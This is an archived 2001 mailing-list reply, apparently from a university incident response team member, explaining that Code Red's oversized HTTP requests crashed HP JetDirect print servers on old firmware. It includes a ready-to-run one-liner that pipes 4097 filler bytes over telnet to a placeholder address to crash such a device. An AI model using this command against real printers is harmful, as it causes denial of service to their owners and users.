Re: Nimda affecting HP LaserJet / JetDirect devices?

From: johan.augustssonat_private
Date: Mon Sep 24 2001 - 07:32:12 PDT

    Trey Valenta wrote:

    > To the best of my knowledge, HP printer issues from Code Red weren't from
    > traffic *volume*, but from content. The HTTP commands were causing the
    > printer's print server software to shut down when running older firmware
    > versions for the JetDirect interface.

    Code Red sent buffer owerflow packages. Those packages downed HP Jet
    Directs with "old" firmware.
    Following line will do the job:
    perl -e 'print "\x90"x4097;'|telnet <ip-address> <port>

    Johan Augustsson                 Phone: +46 (0)31 773 5361
    Incident Response Team           Fax: +46 (0)31 773 1087
    Göteborg University              E-mail: Johan.Augustssonat_private
    Sweden